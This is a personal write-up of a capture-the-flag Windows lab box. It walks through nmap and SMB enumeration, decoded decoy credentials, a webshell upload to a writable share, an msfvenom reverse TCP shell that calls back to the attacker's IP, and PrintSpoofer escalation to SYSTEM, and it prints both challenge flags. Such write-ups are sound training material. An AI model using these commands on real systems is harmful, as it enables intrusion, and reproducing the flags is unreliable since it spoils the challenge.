Mission
“You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.”
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
- User.txt
- Root.txt
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Submit the flags discovered to the dashboard
- Only the IP address assigned to your machine is in scope
- Find and report ALL vulnerabilities (yes, there is more than one path to root)
Nmap scan
I started out this box with a regular nmap scan which found the following ports open.
– 80/tcp http Microsoft IIS httpd 10.0
– 135/tcp msrpc Microsoft Windows RPC
– 139/tcp netbios-ssn Microsoft Windows netbios-ssn
– 445/tcp microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
– 3389/tcp ms-wbt-server Microsoft Terminal Services
nmap -sV -sC 10.10.154.20
Also ran a full port-scan to see if there was any other ports that I had missed. It found one new port at 49663 running another IIS.
nmap -p- -T5 10.10.154.20Port 80 – HTTP
Hit a standard IIS startpage. Tried GoBuster and Dirb but they could not find any subdirectories.
Port 139 – SMB
For SMB i ran a Python-script called smbmap that can enumerate SMB-shares.
smbmap.py -u anonymous -p anonymous -H 10.10.154.20
Found a folder called “nt4wrksv” with READ, WRITE access. Inside the folder there was a password.txt file
Used CyberChef to decode the encoded usernames and passwords.
Decoding from Base64 (Lucky guess on the format…)
Bob – !P@$$W0rD!123
Bill – Juw4nnaM4n420696969!$$$
New accounts doesn´t seem to have any further access through SMB
Nmap scan for vulnerabilities showed potential exploit, CVE-2017-0143
Port 3389 – RDP
Tried loging into the machine using RDP with Remmina and the two found accounts, it didn´t work.
Port 49663 – Another IIS
Tried a new GoBuster-scan on the second IIS I found and found the folder “nt4wrksv”, same as in the SMB-shares.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 --timeout 20s -u http://10.10.154.20:49663Seems it´s the same folder as I can access “http://10.10.154.20:49663/nt4wrksv/passwords.txt” and get the same content as seen before.
Since we have READ, WRITE to this folder I could upload an .aspx-webshell with smbclient and grab the user.txt.
THM{fdk4ka34vk346ksxfr21tg789ktf45}
I also tried crafting a reverse tcp shell using msfvenom and uploaded it to the target.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.208.50 LPORT=4444 -f aspx -o pwn.aspxBrowsing the pwn.aspx returned a shell to my netcat-listener
From here i uploaded PrintSpoofer.exe which i grabbed from https://github.com/dievus/printspoofer. PrintSpoofer is an exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10. To escalate privileges, the service account must have SeImpersonate privileges.
Browsed to c:\inetpub\wwwroot\nt4wrksv and executed
PrintSpoofer.exe -i -c cmd
Which gave me NT AUTHORITY\System 🔥
And the final flag, root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
Conclusion
This challenge was really fun and well made. I focused a lot on keeping notes and taking printscreens to be able to write a short report/summary of the findings I made in the end which I normally haven´t done so far.
At first it was dificult to find anything useful since the first IIS didn´t give me anything to work with. It was not until i found the second one i had something to work with as the password file found through SMB was just a rabbit hole that lead nowhere and was designed to trick you into thinking you found something valueble.
After i found out i could upload files to the SMB-share with WRITE access I tried a simple webshell which got me user access and the first flag. To escalate my privileges i had to turn to Google to find out about the PrintSpoofer exploit and how to use it, that was nothing I have worked with earlier and a good exploit to learn about, might come in handy in future boxes.
– Kevin “Frigol33t” Rehnberg